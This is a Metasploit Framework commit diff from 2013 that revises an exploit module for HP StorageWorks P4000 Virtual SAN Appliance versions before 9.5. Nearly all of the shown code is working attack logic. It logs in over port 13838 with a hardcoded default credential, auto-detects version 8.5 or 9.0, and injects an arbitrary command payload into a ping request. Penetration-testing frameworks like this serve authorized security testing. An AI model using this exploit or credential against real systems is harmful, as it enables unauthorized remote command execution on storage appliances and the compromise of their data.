Merge branch 'hp_vsa_exec_9' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-hp_vsa_exec_9

sinn3r · sinn3r · commit 37634a9e6051 · 2013-02-19T12:36:39.000-06:00
diff --git a/modules/exploits/multi/misc/hp_vsa_exec.rb b/modules/exploits/multi/misc/hp_vsa_exec.rb
@@ -17,7 +17,7 @@ def initialize(info={})
 			'Name'           => "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",
 			'Description'    => %q{
 					This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on
-				versions prior to 9.5.  By using a default account credential, it is possible
+				versions prior to 9.5. By using a default account credential, it is possible
 				to inject arbitrary commands as part of a ping request via port 13838.
 			},
 			'License'        => MSF_LICENSE,
@@ -50,9 +50,11 @@ def initialize(info={})
 			'Arch'           => ARCH_CMD,
 			'Targets'        =>
 				[
-					['HP VSA prior to 9.5', {}]
+					[ 'Automatic',        {} ],
+					[ 'HP VSA up to 8.5', { 'Version' => '8.5.0' } ],
+					[ 'HP VSA 9',         { 'Version' => '9.0.0' } ]
 				],
-			'Privileged'     => false,
+			'Privileged'     => true,
 			'DisclosureDate' => "Nov 11 2011",
 			'DefaultTarget'  => 0))
 
@@ -75,20 +77,53 @@ def generate_packet(data)
 		pkt
 	end
 
+	def get_target
+		if target.name !~ /Automatic/
+			return target
+		end
 
-	def exploit
-		connect
-
-		# Login packet
-		print_status("#{rhost}:#{rport} Sending login packet")
+		# Login at 8.5.0
 		packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"")
+		print_status("#{rhost}:#{rport} Sending login packet for version 8.5.0")
+		sock.put(packet)
+		res = sock.get_once
+		vprint_status(Rex::Text.to_hex_dump(res)) if res
+		if res and res=~ /OK/ and res=~ /Login/
+			return targets[1]
+		end
+
+		# Login at 9.0.0
+		packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"9.0.0\"")
+		print_status("#{rhost}:#{rport} Sending login packet for version 9.0.0")
 		sock.put(packet)
 		res = sock.get_once
 		vprint_status(Rex::Text.to_hex_dump(res)) if res
+		if res and res=~ /OK/ and res =~ /Login/
+			return targets[2]
+		end
+
+		fail_with(Msf::Exploit::Failure::NoTarget, "#{rhost}:#{rport} - Target auto detection didn't work'")
+	end
+
+	def exploit
+		connect
+
+		if target.name =~ /Automatic/
+			my_target = get_target
+			print_good("#{rhost}:#{rport} - Target #{my_target.name} found")
+		else
+			my_target = target
+			print_status("#{rhost}:#{rport} Sending login packet")
+			packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{my_target['Version']}\"")
+			sock.put(packet)
+			res = sock.get_once
+			vprint_status(Rex::Text.to_hex_dump(res)) if res
+		end
 
 		# Command execution
 		print_status("#{rhost}:#{rport} Sending injection")
 		data = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/"
+		data << "64/5/" if my_target.name =~ /9/
 		packet = generate_packet(data)
 		sock.put(packet)
 		res = sock.get_once
